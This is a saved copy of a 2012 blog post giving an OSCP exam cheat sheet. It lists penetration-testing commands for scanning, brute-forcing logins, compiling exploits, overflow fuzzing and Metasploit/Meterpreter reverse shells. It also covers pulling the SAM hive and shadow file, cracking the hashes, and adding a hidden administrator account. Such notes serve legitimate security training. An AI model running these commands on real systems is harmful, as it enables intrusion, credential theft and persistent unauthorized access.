OSCP Cheat Sheet Thank’s to Ash for posting this up over on his blog, i put it here for quick reference & for others to benefit from. Check out his blog over @ http://security.crudtastic.com for more info & inside scoops on the OSCP Original Post: http://security.crudtastic.com/?p=213 Notes Use Leo and make a new child entry for each IP. Keep ALL information related to testing of that machine in that child entry. Create child entries within the IP entry for each type of scan/information gathering. Create a totally separate child entry for username/password combinations, general notes etc. Leo/good record keeping is what will win the game.
www.n1tr0g3n.com/?p=3869
1/12
12/30/12
A nice OSCP cheat sheet |
Scan network for live hosts (nmap/zenmap) For NMAP –
nmap -PN 192.168.9.200-254 (this will also show open ports for each host)
Identify OS (nmap/zenmap) For NMAP –
nmap -O 192.168.0.100 (just OS fingerprint)
nmap -A 192.168.9.201 (runs an “aggressive” scan – scan,OS fingerprint, version scan, scripts and traeroute)
www.n1tr0g3n.com/?p=3869
12/30/12
A nice OSCP cheat sheet |
Check hosts for services (nmap/zenmap) For NMAP - nmap -sS 192.168.9.254 (TCP) - nmap -sU 192.168.9.254 (UDP) (Could be better to do this in zenmap and group servers by services)
FOR SNMP - snmpwalk -c public -v1 192.168.9.254 1 |grep hrSWRunName|cut -d” ” -f
For SMB - nmap -sT -p 445 192.168.9.200-254 -oG smb_results.txt (then grep open sessions) (on my machine /root/offsec) ./samrdump.py 192.168.9.201 (results from above)
POP3 – hydra -l -P mil-dict.txt -f pop3 -V (may need to use -t 15 to limit concurrent connections)
SNMP – hydra -P mil-dict.txt -f -V
MS VPN – dos2unix words (whatever word list) cat words | thc-pptp-bruter VPN server
12/30/12
A nice OSCP cheat sheet |
Look for known vulnerable services (refer nmap/zenmap output) Check versions of software (by either snmp enumeration or nmap/zenmap) against http://www.milw0rm.com/search.php or http://www.securityfocus.com/vulnerabilities or http://www.exploit-db.com
Compile exploit code if possible (milw0rm archive)
cd /pentest/exploits/milw0rm cat sploitlist.txt | grep -i [exploit]
Some exploits may be written for compilation under Windows, while others for Linux. You can identify the environment by inspecting the headers. cat exploit | grep “#include”
WINDOWS cd /root/.wine/drive_c/MinGW/bin wine gcc -o ability.exe ability.c -lwsock32 wine ability.exe (to run compiled file)
Wireshark Filters
To filter out all traffic for IP 192.168.0.100 !(IP.ADDR == 192.168.0.100)
FUZZING STEPS – ASH STYLE 1. Determine target application and operating system www.n1tr0g3n.com/?p=3869
8/12
2. Obtain a copy of the application 3. Analyse the RFC & communication protocols 4. Discover & record crash conditions 5. Analyse crash conditions for exploitation opportunities Things we need to know Which 4 bytes overwrite EIP Do we have enough space in buffer for shellcode Is this shellcode easily accessible in memory Does the application filter out any characters Will we encounter overflow protection mechanisms
(*** HANDY – framework3/tools -> nasm_shell.rb => JMP ESP ***) Creating pattern for EIP location - framework3/tools -> pattern_create.rb >> Fuzzing_script (will append to the end of the script) – then look in ollydbg for pattern (need to reverse it and convert) - pattern_offset.rb – will show byte offset Creating shellcode (in framework3) ./msfpayload |grep -i shell ./msfpayload …… o (for options) ./msfpayload …… c (to create) ** TAKE NOTE OF SHELLCODE SIZE AND ADJUST FINAL BUFFER TO SUIT ** CAN ALSO USE FRAMEWORK2 MSFWEB INTERFACE (super easy)
Finding an exploit /pentest/exploits/milw0rm grep sploitlist.txt
MSFCLI (p243) ./msfcli -o options 9/12
-p payloads -t test -e exploit MSFCONSOLE sessions -l => list created sessions sessions -i # => interact with specific session number show options search use exploit/ ….. set PAYLOAD …. exploit
Meterpreter Payloads (p260) payload = windows/meterpreter/reverse_tcp …. meterpreter> help (lists all commands) upload c:\\windows download c:\\windows\\repair\\sam /tmp ps (running tasks) execute -f cmd -c (creates a new channel with the cmd shell) interact # (interacts with channel)
Other useful windows commands net user ash my_password /add net localgroup administrators ash /add
Passwords & Hashes Windows SAM => %systemroot%\Repair (pwdump or fgdump – p340)
12/30/12
A nice OSCP cheat sheet |
or use framework meterpreter shell => gethashes Linux => /etc/passwd & /etc/shadow
John The Ripper for linux => unshadow passwd & shadow file to another file ./john hashes.txt
Leave a Reply
Your email address will not be published. Required fields are marked * *
Name
*
Email
Website
www.n1tr0g3n.com/?p=3869
11/12
12/30/12
A nice OSCP cheat sheet |
CAPTCHA Code * Comment
You may use these HTML tags and attributes:
Post Comment
Copyright n1tr0g3n Industries . All Rights Reserved.
Thank you for interesting in our services. We are a non-profit group that run this website to share documents. We need your help to maintenance this website.